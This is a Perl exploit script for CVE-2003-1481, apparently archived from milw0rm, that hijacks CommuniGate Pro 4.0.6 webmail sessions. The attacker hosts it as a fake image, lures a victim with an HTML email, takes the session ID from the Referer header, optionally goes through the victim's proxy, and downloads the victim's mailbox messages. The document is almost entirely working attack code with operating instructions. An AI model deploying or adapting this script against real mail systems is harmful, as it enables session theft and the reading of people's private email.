CommuniGate Pro Webmail 4.0.6 - Session Hijacking - CVE-2003-1481

1. #!/usr/bin/perl
2.  
3. # Below is exploit code. Place it into cgi-bin, then
4. # (recommended) make symlink from
5. # DocumentRoot/AnyImage.gif to shj.pl, configure
6. # at least $url variable, and possible other vars and
7. # send victim HTML message with img src to your
8. # AnyImage.gif. When victim will read message, script
9. # will download messages 1..10 from his mailbox (if
10. # sucessfull).
11.  
12. # Script will work even if "require fixed address" option
13. # enabled (set $abuseproxy=1), but it needs access to
14. # users proxy (IP will be detected automatically). So, if
15. # your victim uses same corporate proxy as you, then
16. # you're lucky, you can own his mailbox! :)
17.  
18. # If victim uses HTTPS to access CGP webmail, use
19. # https:// link to image. some browsers will still send
20. # HTTP_REFERER if _both_ sites are https.
21. #
22. # session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
23. #
24. # Yaroslav Polyakov. xenon@sysAttack.com www.sysAttack.com
25. #
26.  
27. use LWP::UserAgent;
28.  
29. # configuration vars
30. $logfile="/tmp/log";
31. $url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";
32. $SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";
33. $msglonum=1;
34. $msghinum=10;
35. $msgprefix="/tmp/hijacked-";
36. $abuseproxy=1;
37. $proxyport=3128;
38.  
39. sub printgif
40. {
41. $gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x00\xc0\xc0\xc0
42. \x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00
43. \x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";
44.  
45.  
46.   print "Content-Type: image/gif\n";
47.   print "\n";
48.   print "$gif1x1";
49. }
50.  
51.  
52. open LOG, "> $logfile" || die("cant write to my log");
53. printgif;
54.  
55.  
56.  
57. $remote=$ENV{'REMOTE_ADDR'};
58. $referer=$ENV{'HTTP_REFERER'};
59. print LOG "remote: $remote\nreferer: $referer\n";
60. # if($referer=~/SID=([0-9a-zA-Z\-]+)/){
61. if($referer=~/$SIDREGEXP/){
62.                 $SID=$1;
63.                 print LOG "SID: $SID\n";
64.                 }else{
65.                                 print LOG "sorry, cant
66. find out SID\n";
67.                                 exit;
68.                 }
69.  
70.  
71.  
72. # create request
73. my $ua = new LWP::UserAgent;
74. $ua->agent("shj - sysAttack CGP session HiJack/1.0");
75.  
76. if($abuseproxy){
77.                 print LOG "set proxy
78. http://$remote:$proxyport/\n";
79.                 $ua->proxy('http',
80. "http://$remote:$proxyport/");
81. }
82.  
83. for($index=$msglonum;$index<=$msghinum;$index++){
84.                $eurl=$url;
85.                 $eurl =~ s/%N%/$index/;
86.                 $eurl =~ s/%SID%/$SID/;
87.                 print LOG "fetching $eurl\n";
88.                 $request = new HTTP::Request("GET", $eurl);
89.                 $response = $ua->request($request);
90.                 if($response){
91.                                 print LOG
92. $response->code." ".$response->message
93. ."\n";
94.                                 open MSG, ">
95. $msgprefix$index" or die('cant crea
96. te $msgprefix$index');
97.                                 print MSG
98. $response->content;
99.                                 close MSG;
100.                 }else{
101.                                 print LOG "undefined
102. response\n";
103.                 }
104. }
105. close LOG;
106.  
107.  
108.  
109. # milw0rm.com [2003-05-05]
110.